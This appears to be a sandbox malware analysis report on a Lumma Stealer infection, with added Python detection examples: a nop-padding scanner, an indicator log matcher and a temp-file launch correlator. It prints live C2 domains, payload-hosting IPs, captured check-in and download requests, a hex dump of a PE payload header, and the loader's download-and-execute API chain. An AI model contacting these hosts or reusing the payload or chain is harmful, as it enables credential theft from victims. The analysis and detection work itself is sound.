Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov edx, eax | 3_2_024B7797
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then lea eax, dword ptr [esp+18h] | 3_2_024B54D1
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ebx, edi | 3_2_024AD4D7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [edi+eax] | 3_2_024A554C
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h] | 3_2_024A6544
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h | 3_2_024CD557
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, word ptr [eax] | 3_2_024CD557
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_024AC528
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_024B552B
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov word ptr [ebp+00h], 0000h | 3_2_024B559D
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_024B55B3
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 3_2_0249DA09
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h] | 3_2_0249DA09
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh] | 3_2_0249EAA2
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+38h] | 3_2_0249CB7E
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h | 3_2_024B5BF7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then movzx ecx, di | 3_2_024B5BF7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov ecx, eax | 3_2_0249ABA7
Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe | Code function: 4x nop then mov edx, ecx | 3_2_0249ABA7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024BB75E
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_024B0817
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_024C3897
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC8B1
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC94B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_02499967
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_024A6907
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov eax, edx3_2_024AC921
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_024B89C0
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_024CA9DE
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_024A99D7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC98D
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_024BC99C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_024C6E67
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [eax], dx3_2_024A5F79
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024B1F77
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [ebx], dx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov word ptr [ebx], cx3_2_024A8F35
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_024CCFC7
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0249DF8C
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_024CBC08
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_024B9C17
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_024AEC17
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_024C6C3B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov esi, eax3_2_024B3C9B
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then mov ecx, eax3_2_024CAD19
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_024CCD87
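The "4x nop then <instruction>" lines above are the sandbox's static signature for the nop padding scattered through the unpacked 91B1.tmp.exe. The scanner below is an added example, not part of the Joe Sandbox report or of the sample: it reads the signature as "exactly four consecutive 0x90 bytes followed by a non-nop byte" (that reading is this example's assumption), reports each site with the bytes that follow, and tallies which opcodes follow the padding so an analyst can see whether the same handful of instructions recurs, as it does in the list above. The input buffer is constructed for the example; on a real case you would feed it the .text section of the dumped executable.

```python
"""Added example (not from the report): locate '4x nop then <insn>' sites.

The match rule is this example's reading of the signature: a run of exactly
four 0x90 bytes that is followed by at least one non-nop byte. Longer runs and
trailing runs with nothing after them are ignored.
"""
from collections import Counter

NOP = 0x90


def find_nop4_sites(buf, run_len=4):
    """Return (offset, hex_of_next_4_bytes) for every run of exactly run_len NOPs."""
    sites = []
    i, n = 0, len(buf)
    while i < n:
        if buf[i] != NOP:
            i += 1
            continue
        j = i
        while j < n and buf[j] == NOP:      # measure the whole run
            j += 1
        if j - i == run_len and j < n:      # exact length, and an instruction follows
            sites.append((i, buf[j:j + 4].hex()))
        i = j
    return sites


def summarize(buf):
    """Return (site count, Counter of the opcode byte that follows each run).

    A small set of follow-up opcodes repeated across many sites is the shape the
    signature keys on: padding inserted in front of ordinary register moves,
    loads and compares.
    """
    sites = find_nop4_sites(buf)
    return len(sites), Counter(nxt[:2] for _, nxt in sites)


# Constructed buffer, not bytes from the sample: a prologue, 4 NOPs then
# 'mov ecx, eax' (8b c8), a 5-NOP run that must not match, a ret, 4 NOPs then
# 'jmp eax' (ff e0), and a trailing 4-NOP run with nothing after it.
SAMPLE = (bytes.fromhex("558bec") + bytes([NOP]) * 4 + bytes.fromhex("8bc8")
          + bytes([NOP]) * 5 + bytes.fromhex("c3") + bytes([NOP]) * 4
          + bytes.fromhex("ffe0") + bytes([NOP]) * 4)

if __name__ == "__main__":
    for off, nxt in find_nop4_sites(SAMPLE):
        print(f"0x{off:04x}: 4x nop then {nxt}")
    print(summarize(SAMPLE))
```

To run it over a dumped binary, read the file in binary mode and pass the bytes of the executable section instead of SAMPLE; scanning whole files including data sections inflates the count with zero-padding look-alikes only if you lower the NOP constant, so keep it at 0x90.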

                  Networking

Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.10:63742 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058223 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI) : 192.168.2.10:49736 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2058214 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz) : 192.168.2.10:60706 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058226 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou) : 192.168.2.10:50695 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058216 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz) : 192.168.2.10:56891 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058218 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz) : 192.168.2.10:57774 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058222 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz) : 192.168.2.10:58446 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058210 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou) : 192.168.2.10:51525 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2058236 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou) : 192.168.2.10:55967 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 45.77.249.79:443 -> 192.168.2.10:49736
Source: Network traffic | Suricata IDS: 2058215 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI) : 192.168.2.10:49748 -> 104.131.68.180:443
Source: Network traffic | Suricata IDS: 2058220 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz) : 192.168.2.10:54262 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2822521 - Severity 1 - ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner) : 104.131.68.180:443 -> 192.168.2.10:49748
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49736 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49736 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.10:49748 -> 104.131.68.180:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.10:49756 -> 104.121.10.34:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.10:49748 -> 104.131.68.180:443
Source: Malware configuration extractor | URLs: deafeninggeh.biz
Source: Malware configuration extractor | URLs: wrathful-jammy.cyou
Source: Malware configuration extractor | URLs: debonairnukk.xyz
Source: Malware configuration extractor | URLs: diffuculttan.xyz
Source: Malware configuration extractor | URLs: sordid-snaked.cyou
Source: Malware configuration extractor | URLs: immureprech.biz
Source: Malware configuration extractor | URLs: effecterectz.xyz
Source: Malware configuration extractor | URLs: awake-weaves.cyou
Source: DNS query: effecterectz.xyz
Source: DNS query: diffuculttan.xyz
Source: DNS query: debonairnukk.xyz
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 17 Dec 2024 08:42:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 17 Dec 2024 08:30:02 GMTETag: "59c00-629731a74cc27"Accept-Ranges: bytesContent-Length: 367616Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f 13 29 12 0b 72 47 41 0b 72 47 41 0b 72 47 41 b6 3d d1 41 0a 72 47 41 15 20 c3 41 15 72 47 41 15 20 d2 41 1f 72 47 41 15 20 c4 41 65 72 47 41 2c b4 3c 41 0c 72 47 41 0b 72 46 41 7d 72 47 41 15 20 cd 41 0a 72 47 41 15 20 d3 41 0a 72 47 41 15 20 d6 41 0a 72 47 41 52 69 63 68 0b 72 47 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e8 6d 86 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f6 03 00 00 26 3f 00 00 00 00 00 77 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 43 00 00 04 00 00 0a f3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 29 04 00 3c 00 00 00 00 10 42 00 a8 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 bc f5 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0e 23 00 00 00 10 04 00 00 24 00 00 00 fa 03 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc c4 3d 00 00 40 04 00 00 70 00 00 00 1e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 0c 01 00 00 10 42 00 00 0e 01 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox View | IP Address: 45.77.249.79
Source: Joe Sandbox View | IP Address: 104.21.56.70
Source: Joe Sandbox View | IP Address: 104.131.68.180
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49715 -> 176.113.115.19:80
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49736 -> 45.77.249.79:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49756 -> 104.121.10.34:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49748 -> 104.131.68.180:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49709 -> 104.21.56.70:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: immureprech.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: deafeninggeh.biz
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
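The Suricata alerts, the extracted C2 domain list, the JA3 fingerprints and the HTTP requests above are the indicators a responder would turn into a hunt. The script below is an added example, not part of the Joe Sandbox report and not an ET or Suricata rule: it matches DNS, TLS and HTTP records against those indicators and assigns severities on the same 1 (high) to 3 (low) scale the Suricata lines use. The record field names (qname, sni, ja3, host, uri, content_length, user_agent) are this example's own schema, and every sample record is constructed after the report's traffic rather than taken from a capture. Note the caveat built into it: the two JA3 hashes only trigger a severity-3 "Possible Malware" rule in the report, so the example treats them as corroboration rather than as a standalone verdict.

```python
"""Added example, not part of the Joe Sandbox report: match DNS, TLS and HTTP
log records against the indicators listed in the Networking section.
Record layout is this example's own; sample records are constructed."""
import re
from dataclasses import dataclass

# C2 domains from the "Malware configuration extractor" lines.
LUMMA_C2_DOMAINS = {
    "deafeninggeh.biz", "wrathful-jammy.cyou", "debonairnukk.xyz",
    "diffuculttan.xyz", "sordid-snaked.cyou", "immureprech.biz",
    "effecterectz.xyz", "awake-weaves.cyou",
}
# Loader-stage hosts: the payload server reached by bare IP without any DNS
# query, and the tracking host.
LOADER_HOSTS = {"176.113.115.19", "post-to-me.com"}
# JA3 hashes recorded for the C2 sessions. Weak on their own: the only ET rule
# they trip is a severity-3 "Possible Malware" match shared with other software.
WEAK_JA3 = {"a0e9f5d64349fb13191bc781f81f42e1", "37f463bf4616ecd445d4a1937da06e19"}
# Fixed User-Agent sent on POST /api and on the Steam profile lookup.
LUMMA_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
            "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
STEAM_PROFILE_RE = re.compile(r"^/profiles/\d{17}$")   # a SteamID64 is 17 digits


@dataclass
class Hit:
    severity: int   # 1 = high, 3 = low, same scale as the Suricata lines
    rule: str
    record: dict


def check_dns(rec):
    qname = rec["qname"].lower().rstrip(".")
    if qname in LUMMA_C2_DOMAINS:
        return Hit(1, "Lumma C2 domain in DNS lookup", rec)
    if qname in LOADER_HOSTS:
        return Hit(2, "loader tracking host in DNS lookup", rec)
    return None


def check_tls(rec):
    if rec.get("sni", "").lower() in LUMMA_C2_DOMAINS:
        return Hit(1, "Lumma C2 domain in TLS SNI", rec)
    if rec.get("ja3") in WEAK_JA3:
        return Hit(3, "JA3 seen in Lumma C2 session (weak, corroborate)", rec)
    return None


def check_http(rec):
    ua = rec.get("user_agent", "")
    host = rec.get("host", "").lower()
    # Loader: custom UA "ShareScreen" and a payload fetched from a bare-IP host.
    if ua == "ShareScreen" or host in LOADER_HOSTS:
        return Hit(2, "ShareScreen downloader request", rec)
    # C2 check-in: POST /api, form-encoded, 8-byte body, fixed Chrome/119 UA.
    if (rec.get("method") == "POST" and rec.get("uri") == "/api"
            and rec.get("content_length") == 8 and ua == LUMMA_UA):
        return Hit(1, "Lumma C2 host check-in shape", rec)
    # Steam profile fetched with the same non-browser UA.
    if (host == "steamcommunity.com" and ua == LUMMA_UA
            and STEAM_PROFILE_RE.match(rec.get("uri", ""))):
        return Hit(2, "Steam profile lookup with Lumma UA", rec)
    return None


CHECKS = {"dns": check_dns, "tls": check_tls, "http": check_http}


def scan(records):
    """Run the check for each record's type and return the hits in order."""
    hits = []
    for rec in records:
        hit = CHECKS[rec["type"]](rec)
        if hit is not None:
            hits.append(hit)
    return hits


# Constructed records shaped after the report's traffic; not a real capture.
SAMPLE_RECORDS = [
    {"type": "dns", "qname": "sordid-snaked.cyou."},
    {"type": "dns", "qname": "www.microsoft.com"},
    {"type": "tls", "sni": "immureprech.biz", "ja3": "a0e9f5d64349fb13191bc781f81f42e1"},
    {"type": "tls", "sni": "steamcommunity.com", "ja3": "a0e9f5d64349fb13191bc781f81f42e1"},
    {"type": "http", "method": "GET", "uri": "/ScreenUpdateSync.exe",
     "host": "176.113.115.19", "user_agent": "ShareScreen"},
    {"type": "http", "method": "POST", "uri": "/api", "host": "immureprech.biz",
     "content_length": 8, "user_agent": LUMMA_UA},
    {"type": "http", "method": "GET", "uri": "/profiles/76561199724331900",
     "host": "steamcommunity.com", "user_agent": LUMMA_UA},
    {"type": "http", "method": "GET", "uri": "/", "host": "example.com",
     "user_agent": LUMMA_UA},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(f"sev{hit.severity} {hit.rule}: {hit.record}")
```

The Chrome/119 User-Agent on its own is not an indicator (real browsers send it too); it only counts here in combination with the 8-byte POST /api body or the profile fetch, which is why the last sample record produces no hit.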
Source: unknown | TCP traffic detected without corresponding DNS query: 176.113.115.19 (this line is repeated 50 times in the report)
Source: C:\Users\user\Desktop\hpEAJnNwCB.exe | Code function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_004029F4
Source: global traffic | HTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1 | User-Agent: ShareScreen | Host: post-to-me.com
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1 | User-Agent: ShareScreen | Host: 176.113.115.19
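The code-function line for 0_2_004029F4 is the whole first stage in one API chain: InternetOpenUrlW fetches the payload, GetTempPathW and GetTempFileNameW pick a name under %TEMP%, CreateFileW and WriteFile drop it, and ShellExecuteExW launches it, which is how 91B1.tmp.exe came to exist. On an endpoint that chain leaves a file-create event followed by a process-create event whose image is the file the parent just wrote. The correlation below is an added example, not part of the report and not a Sysmon or Joe Sandbox rule: the event dicts only mimic Sysmon event IDs 11 (FileCreate) and 1 (ProcessCreate), the sample events are constructed, and treating a GetTempFileNameW-style name with .exe appended (like 91B1.tmp.exe) as an extra signal is this example's own assumption.

```python
"""Added example, not from the report: correlate endpoint events to catch the
loader chain InternetOpenUrlW -> GetTempFileNameW -> WriteFile -> ShellExecuteExW.
Event dicts mimic Sysmon IDs 11 (FileCreate) and 1 (ProcessCreate) but use this
example's own schema; all sample events are constructed."""
import re
from collections import defaultdict

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# The dropped file was 91B1.tmp.exe: a GetTempFileNameW name (hex digits plus
# .tmp) with .exe appended. Scoring that shape is this example's assumption.
TMP_EXE_NAME_RE = re.compile(r"^[0-9A-F]{1,4}\.tmp\.exe$", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def correlate(events):
    """Flag every process whose parent wrote that same image into %TEMP% first.

    events: dicts in arrival order.
      id 11: {"pid", "target"}               file written by pid
      id 1 : {"pid", "image", "parent_pid"}  new process and its parent
    Returns one alert dict per matching child process.
    """
    written = defaultdict(set)   # pid -> lower-cased temp paths it created
    alerts = []
    for ev in events:
        if ev["id"] == 11 and TEMP_DIR_RE.search(ev["target"]):
            written[ev["pid"]].add(ev["target"].lower())
        elif ev["id"] == 1:
            parent = ev["parent_pid"]
            if ev["image"].lower() not in written.get(parent, ()):
                continue
            score = 2
            why = ["parent wrote this image into %TEMP% before launching it"]
            if TMP_EXE_NAME_RE.match(basename(ev["image"])):
                score += 1
                why.append("GetTempFileNameW-style name with .exe appended")
            alerts.append({"child_pid": ev["pid"], "parent_pid": parent,
                           "image": ev["image"], "score": score, "why": why})
    return alerts


# Constructed event stream: the report's chain, an unrelated temp write, and an
# installer that also runs a temp executable (still flagged, at a lower score).
SAMPLE_EVENTS = [
    {"id": 1, "pid": 100, "image": r"C:\Users\user\Desktop\hpEAJnNwCB.exe", "parent_pid": 4},
    {"id": 11, "pid": 100, "target": r"C:\Users\user\AppData\Local\Temp\91B1.tmp.exe"},
    {"id": 1, "pid": 200, "image": r"C:\Users\user\AppData\Local\Temp\91B1.tmp.exe", "parent_pid": 100},
    {"id": 11, "pid": 300, "target": r"C:\Users\user\AppData\Local\Temp\setup.log"},
    {"id": 1, "pid": 301, "image": r"C:\Windows\System32\notepad.exe", "parent_pid": 300},
    {"id": 11, "pid": 400, "target": r"C:\Users\user\AppData\Local\Temp\updater.exe"},
    {"id": 1, "pid": 401, "image": r"C:\Users\user\AppData\Local\Temp\updater.exe", "parent_pid": 400},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert["score"], alert["image"], "; ".join(alert["why"]))
```

Legitimate installers do write and run executables from %TEMP%, which is why the base score stays low; pairing the alert with the network hits (the ShareScreen User-Agent and the bare-IP download seen above) is what lifts it to an incident.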
